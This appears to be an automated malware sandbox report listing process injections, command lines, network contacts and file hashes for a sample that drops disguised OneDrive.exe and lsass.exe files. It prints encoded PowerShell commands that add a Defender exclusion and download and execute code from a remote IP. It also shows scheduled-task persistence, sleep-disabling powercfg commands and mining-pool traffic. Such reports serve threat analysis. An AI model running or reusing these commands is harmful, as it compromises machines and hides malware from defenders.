PID 4656 wrote to memory of 4904 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4656 wrote to memory of 4904 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4656 wrote to memory of 2328 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4656 wrote to memory of 2328 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4600 wrote to memory of 1440 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 4600 wrote to memory of 1440 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 4600 wrote to memory of 1440 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 4600 wrote to memory of 548 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 4600 wrote to memory of 548 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 4600 wrote to memory of 548 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 4600 wrote to memory of 548 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 4600 wrote to memory of 548 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 4600 wrote to memory of 548 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 4600 wrote to memory of 548 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 4600 wrote to memory of 548 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 2328 wrote to memory of 1076 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 2328 wrote to memory of 1076 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 2328 wrote to memory of 1076 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 2328 wrote to memory of 1076 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 2328 wrote to memory of 1076 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 2328 wrote to memory of 1076 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 2328 wrote to memory of 1076 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 2328 wrote to memory of 1076 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 4904 wrote to memory of 3468 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\OneDrive.exe
PID 4904 wrote to memory of 3468 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\OneDrive.exe
PID 1684 wrote to memory of 1372 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 1684 wrote to memory of 1372 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 1684 wrote to memory of 1032 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 1684 wrote to memory of 1032 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 1684 wrote to memory of 2132 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 1684 wrote to memory of 2132 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 1684 wrote to memory of 4412 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 1684 wrote to memory of 4412 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 4904 wrote to memory of 4504 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\dllhost.exe
PID 4904 wrote to memory of 4504 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\dllhost.exe
PID 4904 wrote to memory of 4504 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\dllhost.exe
PID 4632 wrote to memory of 4756 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 4632 wrote to memory of 4756 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 4632 wrote to memory of 2384 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 4632 wrote to memory of 2384 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 4632 wrote to memory of 2608 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 4632 wrote to memory of 2608 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 4632 wrote to memory of 4256 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 4632 wrote to memory of 4256 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 4904 wrote to memory of 3376 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\lsass.exe
PID 4904 wrote to memory of 3376 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\lsass.exe
PID 4904 wrote to memory of 3376 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\lsass.exe
PID 3576 wrote to memory of 1700 N/A C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe C:\Windows\System32\conhost.exe
PID 3576 wrote to memory of 1976 N/A C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe C:\Windows\System32\conhost.exe
PID 3376 wrote to memory of 3476 N/A C:\Users\Admin\AppData\Roaming\lsass.exe C:\Windows\SysWOW64\schtasks.exe
PID 3376 wrote to memory of 3476 N/A C:\Users\Admin\AppData\Roaming\lsass.exe C:\Windows\SysWOW64\schtasks.exe
PID 3376 wrote to memory of 3476 N/A C:\Users\Admin\AppData\Roaming\lsass.exe C:\Windows\SysWOW64\schtasks.exe
PID 3376 wrote to memory of 220 N/A C:\Users\Admin\AppData\Roaming\lsass.exe C:\ProgramData\lsass\lsass.exe
PID 3376 wrote to memory of 220 N/A C:\Users\Admin\AppData\Roaming\lsass.exe C:\ProgramData\lsass\lsass.exe
PID 3376 wrote to memory of 220 N/A C:\Users\Admin\AppData\Roaming\lsass.exe C:\ProgramData\lsass\lsass.exe
PID 3376 wrote to memory of 2500 N/A C:\Users\Admin\AppData\Roaming\lsass.exe C:\Windows\SysWOW64\cmd.exe
PID 3376 wrote to memory of 2500 N/A C:\Users\Admin\AppData\Roaming\lsass.exe C:\Windows\SysWOW64\cmd.exe
PID 3376 wrote to memory of 2500 N/A C:\Users\Admin\AppData\Roaming\lsass.exe C:\Windows\SysWOW64\cmd.exe
PID 2500 wrote to memory of 2340 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 2500 wrote to memory of 2340 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Users\Admin\AppData\Local\Temp\file.exe

"C:\Users\Admin\AppData\Local\Temp\file.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -enc IABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQwA6AFwA

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -enc JABmADUAPQAnAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvACcAOwAgACQAZgAxAD0AJwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQAnADsAIAAkAGYAMwA9ACcAYQBkAFMAdAByAGkAbgBnACgAJwAnAGgAdAB0AHAAOgAvAC8ANgAyAC4AMgAwADQALgA0ADEALgAyADMALwBvAC4AcABuAGcAJwAnACkAJwA7ACQARwBPAE8APQBJAGAARQBgAFgAIAAoACQAZgAxACwAJABmADUALAAkAGYAMwAgAC0ASgBvAGkAbgAgACcAJwApAHwASQBgAEUAYABYAA==

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -enc JABmADUAPQAnAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvACcAOwAgACQAZgAxAD0AJwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQAnADsAIAAkAGYAMwA9ACcAYQBkAFMAdAByAGkAbgBnACgAJwAnAGgAdAB0AHAAOgAvAC8ANgAyAC4AMgAwADQALgA0ADEALgAyADMALwByAC4AcABuAGcAJwAnACkAJwA7ACQARwBPAE8APQBJAGAARQBgAFgAIAAoACQAZgAxACwAJABmADUALAAkAGYAMwAgAC0ASgBvAGkAbgAgACcAJwApAHwASQBgAEUAYABYAA==

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -enc JABmADUAPQAnAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvACcAOwAgACQAZgAxAD0AJwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQAnADsAIAAkAGYAMwA9ACcAYQBkAFMAdAByAGkAbgBnACgAJwAnAGgAdAB0AHAAOgAvAC8ANgAyAC4AMgAwADQALgA0ADEALgAyADMALwBmAGkAbABlAC4AcABuAGcAJwAnACkAJwA7ACQARwBPAE8APQBJAGAARQBgAFgAIAAoACQAZgAxACwAJABmADUALAAkAGYAMwAgAC0ASgBvAGkAbgAgACcAJwApAHwASQBgAEUAYABYAA==

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"

C:\Users\Admin\AppData\Roaming\OneDrive.exe

"C:\Users\Admin\AppData\Roaming\OneDrive.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#uxwihwxmk#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'OneDrive' /tr '''C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'OneDrive' -RunLevel 'Highest' -Force; }

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Users\Admin\AppData\Roaming\dllhost.exe

"C:\Users\Admin\AppData\Roaming\dllhost.exe"

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /run /tn "OneDrive"

C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe

C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#uxwihwxmk#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'OneDrive' /tr '''C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'OneDrive' -RunLevel 'Highest' -Force; }

C:\Users\Admin\AppData\Roaming\lsass.exe

"C:\Users\Admin\AppData\Roaming\lsass.exe"

C:\Windows\System32\conhost.exe

C:\Windows\System32\conhost.exe

C:\Windows\System32\conhost.exe

C:\Windows\System32\conhost.exe

C:\Windows\SysWOW64\schtasks.exe

"schtasks.exe" /create /tn OneDrive /tr "C:\ProgramData\lsass\lsass.exe" /st 13:10 /du 23:59 /sc daily /ri 1 /f

C:\ProgramData\lsass\lsass.exe

"C:\ProgramData\lsass\lsass.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpE275.tmp.bat""

C:\Windows\SysWOW64\timeout.exe

timeout 7

Network

Country Destination Domain Proto
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
RU 62.204.41.23:80 62.204.41.23 tcp
RU 62.204.41.23:80 62.204.41.23 tcp
RU 62.204.41.23:80 62.204.41.23 tcp
US 8.8.8.8:53 23.41.204.62.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 ipinfo.io udp
US 34.117.59.81:80 ipinfo.io tcp
US 8.8.8.8:53 81.59.117.34.in-addr.arpa udp
N/A 185.161.248.16:26885 tcp
US 8.8.8.8:53 16.248.161.185.in-addr.arpa udp
US 8.8.8.8:53 123.108.74.40.in-addr.arpa udp
RU 62.204.41.23:80 62.204.41.23 tcp
US 8.8.8.8:53 pool.hashvault.pro udp
DE 95.179.241.203:80 pool.hashvault.pro tcp
US 8.8.8.8:53 maper.info udp
US 8.8.8.8:53 203.241.179.95.in-addr.arpa udp
DE 148.251.234.93:443 maper.info tcp
US 8.8.8.8:53 93.234.251.148.in-addr.arpa udp
US 52.242.101.226:443 tcp
US 52.182.143.210:443 tcp
US 52.242.101.226:443 tcp
US 8.8.8.8:53 233.141.123.20.in-addr.arpa udp
US 209.197.3.8:80 tcp
US 209.197.3.8:80 tcp
NL 173.223.113.164:443 tcp
US 52.242.101.226:443 tcp
NL 173.223.113.131:80 tcp
US 204.79.197.203:80 tcp
US 52.242.101.226:443 tcp
US 52.242.101.226:443 tcp
US 52.242.101.226:443 tcp
N/A 185.161.248.16:4440 tcp

Files

memory/4656-133-0x0000000000960000-0x000000000097C000-memory.dmp

memory/4600-140-0x00000249E2620000-0x00000249E2642000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_znaugxvq.api.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4716-172-0x000001662BA20000-0x000001662BA30000-memory.dmp

memory/4716-173-0x000001662BA20000-0x000001662BA30000-memory.dmp

memory/4600-174-0x00000249E2410000-0x00000249E2420000-memory.dmp

memory/2328-176-0x000001B826F10000-0x000001B826F20000-memory.dmp

memory/2328-175-0x000001B826F10000-0x000001B826F20000-memory.dmp

memory/4600-177-0x00000249E2410000-0x00000249E2420000-memory.dmp

memory/4716-178-0x000001662BA20000-0x000001662BA30000-memory.dmp

memory/4716-179-0x000001662BA20000-0x000001662BA30000-memory.dmp

memory/548-182-0x0000000000400000-0x000000000040C000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 026d93a446c50e4ae9aa47a15d0e923f
SHA1 f8832c1a57c63bc1b085b10f39b69254e27b2fb8
SHA256 c06620ef42e09394b9fb9816937e9161cdb5740ad2c1a312f55483cbc2adf089
SHA512 009c2cc902b3c560f77f882d4cd432e6893c51b8932889a4de8b119933e6bb6a9c91948dbb7ec392e120dfadca0211134625ffd6252b261fc84af8e17fbc2181

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 d85ba6ff808d9e5444a4b369f5bc2730
SHA1 31aa9d96590fff6981b315e0b391b575e4c0804a
SHA256 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA512 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

memory/548-186-0x00000000052D0000-0x0000000005336000-memory.dmp

memory/548-187-0x00000000053E0000-0x000000000547C000-memory.dmp

memory/548-188-0x0000000005480000-0x00000000054E6000-memory.dmp

memory/548-190-0x0000000005960000-0x0000000005970000-memory.dmp

memory/1076-191-0x0000000000400000-0x0000000000430000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 f1549cc7b079aafe5a84d4589e478849
SHA1 7b075f7b88d8a2c5d9cd27090a514d60de5bbd4d
SHA256 6adfd6fd5b210f2cbf2ca9f3a89a27c937fba828a9c00888c1c3f86c6c4b38d5
SHA512 7ff46d7a36ebb1607f923d151e5ae3e17559bc18f5f621be0bbb16365ddcdb255794fe47cfb354cf0f58f6763bc628c1c98df7933f927e20d93dbc2c5519fc20

memory/1076-194-0x000000000AA80000-0x000000000B098000-memory.dmp

memory/1076-195-0x000000000A590000-0x000000000A69A000-memory.dmp

memory/1076-196-0x000000000A4C0000-0x000000000A4D2000-memory.dmp

memory/1076-197-0x0000000004FD0000-0x0000000004FE0000-memory.dmp

memory/1076-198-0x000000000A520000-0x000000000A55C000-memory.dmp

memory/4904-201-0x0000013BD50F0000-0x0000013BD5100000-memory.dmp

memory/4904-202-0x0000013BD50F0000-0x0000013BD5100000-memory.dmp

memory/1076-203-0x000000000A830000-0x000000000A8A6000-memory.dmp

memory/1076-204-0x000000000A950000-0x000000000A9E2000-memory.dmp

memory/1076-205-0x000000000B650000-0x000000000BBF4000-memory.dmp

C:\Users\Admin\AppData\Roaming\OneDrive.exe

MD5 743022328f955e2cbb5f2f375bd0ab72
SHA1 226a731c638cf6e79b92cc2bb6369b04e6a98b55
SHA256 dbe99e4119c6f19e273cbedbbe27afb953f92f7284638dda5c0630b7b0befa4f
SHA512 aeebe2dfca665153bebb637875ce6334959c00022ec7fd9209e444e45b28fce5e6b53c13b5f89ffae790fec92f01829229ffbfa690f10ab115a62053edfe1f83

memory/1076-210-0x000000000B560000-0x000000000B5B0000-memory.dmp

C:\Users\Admin\AppData\Roaming\OneDrive.exe

MD5 743022328f955e2cbb5f2f375bd0ab72
SHA1 226a731c638cf6e79b92cc2bb6369b04e6a98b55
SHA256 dbe99e4119c6f19e273cbedbbe27afb953f92f7284638dda5c0630b7b0befa4f
SHA512 aeebe2dfca665153bebb637875ce6334959c00022ec7fd9209e444e45b28fce5e6b53c13b5f89ffae790fec92f01829229ffbfa690f10ab115a62053edfe1f83

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 f1549cc7b079aafe5a84d4589e478849
SHA1 7b075f7b88d8a2c5d9cd27090a514d60de5bbd4d
SHA256 6adfd6fd5b210f2cbf2ca9f3a89a27c937fba828a9c00888c1c3f86c6c4b38d5
SHA512 7ff46d7a36ebb1607f923d151e5ae3e17559bc18f5f621be0bbb16365ddcdb255794fe47cfb354cf0f58f6763bc628c1c98df7933f927e20d93dbc2c5519fc20

memory/548-223-0x0000000005960000-0x0000000005970000-memory.dmp

memory/2224-224-0x000001A84B8B0000-0x000001A84B8C0000-memory.dmp

memory/2224-225-0x000001A84B8B0000-0x000001A84B8C0000-memory.dmp

C:\Users\Admin\AppData\Roaming\dllhost.exe

MD5 08e3930a42197a422d064569c4778997
SHA1 74832aa332b48422e5d448f5099b397e84c18712
SHA256 322626ca37f3929c517b4c0ceeb130836be5f36a1eb68ab0adb00c0f4a3f3813
SHA512 b70952bc3cd54abcc2c7c1c71b1f16d96a001900574237263a210512a348542e6ec7a05e7fcc0ff5831a200db23fae06f2bbb0f0bb249599fed0fa1761516368

C:\Users\Admin\AppData\Roaming\dllhost.exe

MD5 08e3930a42197a422d064569c4778997
SHA1 74832aa332b48422e5d448f5099b397e84c18712
SHA256 322626ca37f3929c517b4c0ceeb130836be5f36a1eb68ab0adb00c0f4a3f3813
SHA512 b70952bc3cd54abcc2c7c1c71b1f16d96a001900574237263a210512a348542e6ec7a05e7fcc0ff5831a200db23fae06f2bbb0f0bb249599fed0fa1761516368

C:\Users\Admin\AppData\Roaming\dllhost.exe

MD5 08e3930a42197a422d064569c4778997
SHA1 74832aa332b48422e5d448f5099b397e84c18712
SHA256 322626ca37f3929c517b4c0ceeb130836be5f36a1eb68ab0adb00c0f4a3f3813
SHA512 b70952bc3cd54abcc2c7c1c71b1f16d96a001900574237263a210512a348542e6ec7a05e7fcc0ff5831a200db23fae06f2bbb0f0bb249599fed0fa1761516368

C:\Users\Admin\AppData\Roaming\OneDrive.exe

MD5 743022328f955e2cbb5f2f375bd0ab72
SHA1 226a731c638cf6e79b92cc2bb6369b04e6a98b55
SHA256 dbe99e4119c6f19e273cbedbbe27afb953f92f7284638dda5c0630b7b0befa4f
SHA512 aeebe2dfca665153bebb637875ce6334959c00022ec7fd9209e444e45b28fce5e6b53c13b5f89ffae790fec92f01829229ffbfa690f10ab115a62053edfe1f83

memory/3468-236-0x00007FF641530000-0x00007FF641EFA000-memory.dmp

memory/1076-237-0x0000000004FD0000-0x0000000004FE0000-memory.dmp

memory/4504-238-0x0000000004900000-0x0000000004901000-memory.dmp

memory/4504-240-0x00000000048F0000-0x00000000048F1000-memory.dmp

memory/4504-239-0x00000000048E0000-0x00000000048E1000-memory.dmp

memory/4504-241-0x0000000000400000-0x000000000083B000-memory.dmp

C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe

MD5 743022328f955e2cbb5f2f375bd0ab72
SHA1 226a731c638cf6e79b92cc2bb6369b04e6a98b55
SHA256 dbe99e4119c6f19e273cbedbbe27afb953f92f7284638dda5c0630b7b0befa4f
SHA512 aeebe2dfca665153bebb637875ce6334959c00022ec7fd9209e444e45b28fce5e6b53c13b5f89ffae790fec92f01829229ffbfa690f10ab115a62053edfe1f83

C:\Users\Admin\AppData\Roaming\lsass.exe

MD5 eb85c562249e96d7a946111241f0ea4b
SHA1 5c89db5dad53c26ec1f8189261a7fc4eace18773
SHA256 95f47af1a69cb5ee8b7a85ff7e17901819813f7d2035bec40a73d2c8f76540c8
SHA512 ee193460fc300d57bee2a57794bebfe7edbf22a72764faf42a8e8dd90f65603058e511f51f4a2aab7342febbe9a054c49c8d55eb5c6cd09fb3b983040ac84f77

C:\Users\Admin\AppData\Roaming\lsass.exe

MD5 eb85c562249e96d7a946111241f0ea4b
SHA1 5c89db5dad53c26ec1f8189261a7fc4eace18773
SHA256 95f47af1a69cb5ee8b7a85ff7e17901819813f7d2035bec40a73d2c8f76540c8
SHA512 ee193460fc300d57bee2a57794bebfe7edbf22a72764faf42a8e8dd90f65603058e511f51f4a2aab7342febbe9a054c49c8d55eb5c6cd09fb3b983040ac84f77

C:\Users\Admin\AppData\Roaming\lsass.exe

MD5 eb85c562249e96d7a946111241f0ea4b
SHA1 5c89db5dad53c26ec1f8189261a7fc4eace18773
SHA256 95f47af1a69cb5ee8b7a85ff7e17901819813f7d2035bec40a73d2c8f76540c8
SHA512 ee193460fc300d57bee2a57794bebfe7edbf22a72764faf42a8e8dd90f65603058e511f51f4a2aab7342febbe9a054c49c8d55eb5c6cd09fb3b983040ac84f77

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 64ddcd20cc3b866dc5e20ac63703d83c
SHA1 82fb463233e4e14031e1a96e93a00651ebb9c9c8
SHA256 62597c2996a1db12f80195431b3eb8278a9cb6e910303b709b9bcb3f1258f933
SHA512 0525cf562c02b49a4eec8a786dac767e3c41e71517cdcbd2a7100777a70c2e616ad9f88a6ea8f48c37fcf6b5e27d38d8553a5bbc1621c6a43e08ad0c929b78d3

memory/2804-263-0x000001FA3C770000-0x000001FA3C780000-memory.dmp

memory/2804-265-0x000001FA3C770000-0x000001FA3C780000-memory.dmp

memory/3376-264-0x0000000000AB0000-0x0000000000ED0000-memory.dmp

memory/2804-267-0x000001FA3C770000-0x000001FA3C780000-memory.dmp

memory/3376-266-0x0000000000AB0000-0x0000000000ED0000-memory.dmp

memory/1076-268-0x000000000C0C0000-0x000000000C282000-memory.dmp

memory/2804-269-0x000001FA3C770000-0x000001FA3C780000-memory.dmp

memory/1076-270-0x000000000CFD0000-0x000000000D4FC000-memory.dmp

C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe

MD5 743022328f955e2cbb5f2f375bd0ab72
SHA1 226a731c638cf6e79b92cc2bb6369b04e6a98b55
SHA256 dbe99e4119c6f19e273cbedbbe27afb953f92f7284638dda5c0630b7b0befa4f
SHA512 aeebe2dfca665153bebb637875ce6334959c00022ec7fd9209e444e45b28fce5e6b53c13b5f89ffae790fec92f01829229ffbfa690f10ab115a62053edfe1f83

memory/1976-277-0x000001BCC75E0000-0x000001BCC7600000-memory.dmp

memory/3576-276-0x00007FF750F50000-0x00007FF75191A000-memory.dmp

C:\ProgramData\lsass\lsass.exe

MD5 eb85c562249e96d7a946111241f0ea4b
SHA1 5c89db5dad53c26ec1f8189261a7fc4eace18773
SHA256 95f47af1a69cb5ee8b7a85ff7e17901819813f7d2035bec40a73d2c8f76540c8
SHA512 ee193460fc300d57bee2a57794bebfe7edbf22a72764faf42a8e8dd90f65603058e511f51f4a2aab7342febbe9a054c49c8d55eb5c6cd09fb3b983040ac84f77

C:\ProgramData\lsass\lsass.exe

MD5 eb85c562249e96d7a946111241f0ea4b
SHA1 5c89db5dad53c26ec1f8189261a7fc4eace18773
SHA256 95f47af1a69cb5ee8b7a85ff7e17901819813f7d2035bec40a73d2c8f76540c8
SHA512 ee193460fc300d57bee2a57794bebfe7edbf22a72764faf42a8e8dd90f65603058e511f51f4a2aab7342febbe9a054c49c8d55eb5c6cd09fb3b983040ac84f77

memory/3376-293-0x0000000000AB0000-0x0000000000ED0000-memory.dmp

memory/220-295-0x0000000000770000-0x0000000000B90000-memory.dmp

memory/220-296-0x0000000000770000-0x0000000000B90000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\lsass.exe.log

MD5 24cfd42a8de70b38ed70e1f8cf4eda1c
SHA1 e447168fd38da9175084b36a06c3e9bbde99064c
SHA256 93b740416114e346878801c73e8a8670ff1390d3fa009424b88fafe614a3c5cd
SHA512 5c2daf5328ba99d750e9d0362e84f3a79b7fc8395aa8aa2bc1a01b266583fe1f8352bf0619f985aa72223412d14afa054537739b4941610a1d0f96e7fee2a875

